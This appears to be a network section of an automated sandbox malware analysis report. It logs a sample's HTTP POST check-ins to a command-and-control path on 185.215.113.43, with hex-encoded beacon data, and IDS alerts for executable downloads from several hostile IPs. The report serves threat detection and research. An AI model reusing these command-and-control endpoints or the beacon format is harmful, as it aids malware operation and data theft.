Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49720 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49873 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50022 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50140 -> 87.120.125.254:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50140 -> 87.120.125.254:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50142 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50143 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50145 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50146 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50148 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50151 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50158 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50162 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50157 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50163 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50164 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50165 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50166 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50169 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50167 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50172 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50155 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50170 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50174 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50180 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50183 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50182 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50185 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50193 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50198 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50204 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50202 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50212 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50215 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50216 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50352 -> 20.189.173.17:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49805
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:50103

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49819 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C76CC60 PR_Recv,

0_2_6C76CC60

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
